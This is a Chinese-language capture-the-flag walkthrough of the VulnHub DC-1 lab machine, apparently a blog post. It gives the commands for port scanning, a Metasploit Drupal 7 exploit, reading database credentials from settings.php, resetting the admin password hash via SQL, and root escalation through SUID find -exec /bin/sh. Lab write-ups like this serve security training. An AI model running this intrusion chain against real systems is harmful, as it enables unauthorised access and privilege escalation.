kali dc-1 通关报告

  • DC1环境

1.DC1靶机,下载地址:https://download.vulnhub.com/dc/DC-1.zip

二.开始通关

1.打开虚拟机,进行信息收集

DC1靶机的ip我们不清楚,利用ifconfig查看自己的虚拟机ip

-sP是只扫描在线的主机,不扫描端口nmap -sP 192.168.211.0/24

  1. 收集信息,查看端口和服务

-A所有信息(系统版本有哪些端口等等)

-v他会给出扫描过程中的详细信息 -p指定地址或端口

nmap -A -p- -v 192.168.***.***(后两位是DC1的IP同样每人不相同)

发现了22算口开放了ssh服务

80端口发现web服务

111端口开放了rpcbind服务

访问web站点(是CD1的ip,不是自己的Ip)

发现是电信的drupal服务通过nmap可得知当前运行的是dtupsl 7的cms

可以去网上搜drupal 7的漏洞

得知需要利用MSF渗透

  1. 进入MSF控制台,查询drupal模块

进入控制台命令Msfconsol

命令Search drupal

  1. 选择模块进行测试

这里需要选择2018测试,use选择模块use 1

  1. 设置靶机(虚拟机这里是CD1的ip)运行MSF

Set rhosts 192.168.***.***(注意是CD1的ip地址)

run运行漏洞

执行whoami显示当前用户权限,然后进入的是shell

发现他是www-data权限,进入home目录下cd /home,ls查看发现有flag4文件,用cd flag4切换到flag4路径下,然后ls查看,发现flag4.txt,用cat flag4.txt进入文件查看

大致意思是没有权限,需要提权

  1. 这里用Python改变shell的类型

python -c "import pty;pty.spawn('/bin/bash')"

  1. 发现flag1文件

查看www目录下发现flag1文件,打开发现需要寻找drupal默认路径

Cd /var/www

ls

cat flag1.txt(打开flag1t.t文件)

到浏览器搜索drupal的默认路径

发现drupal的默认的配置文件是

cat /var/www/sites/default//settings.php

发现了flag2与数据库的账号和密码,提示需要提升为root权限

进入数据库

账号‘username’ => ‘dbuser’,

密码‘password’ => ‘R0ck3t’,

mysql -u dbuser -p(需要要输入数据库密码)

进入数据库,再进入到drupaldb数据库

use drupaldb

查询默认的drupal user表

Select * from users;

发现账号,不知道密码

解决方法,置换drupal密码

退出msql进入www目录下

quit;(退出)

在www目录下执行

php scripts/password-hash.sh 新密码(自己设)

然后再进入msql数据库中进行密码替换,进入msql,输入密码在切换到drupaldb数据库

mysql -u dbuser -pR0ck3t(不用在输入密码了-p已经带上了)

use drupaldb(切换到此数据库)

将pass字段进行替换

update users set pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";有空格

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";没有空格

  1. 进入站点输入账号admin (账号固定)密码123(自己设的)
  2. 进入之后随便看看发现flag3,打开就出现

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

大概的意思就是提权,通过-exec,想到suid授权find

Find / -perm -4000 2>/dev/null(发现find命令)

发现root权限

touch 123(创建新的文件)

Ls(查看)

Find / -name 123 -exec "whoami" \;(查看有没有root权限)

  1. 发现最后的flag文件

我们切换语句进入shcll,使用whoami查看当前权限,在使用ls查看当前目录下文件

在切换到root目录下ls查看文件,发现thefinalflag.txt文件

Find ./ -name 123 -exec "/bin/sh" \;

Whoami(查看当前权限)Ls(查看)

Cd /root(切换到root目录)Ls(查看)

Cat thefinalflag.txt  (打开这个文件)                                                                      

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值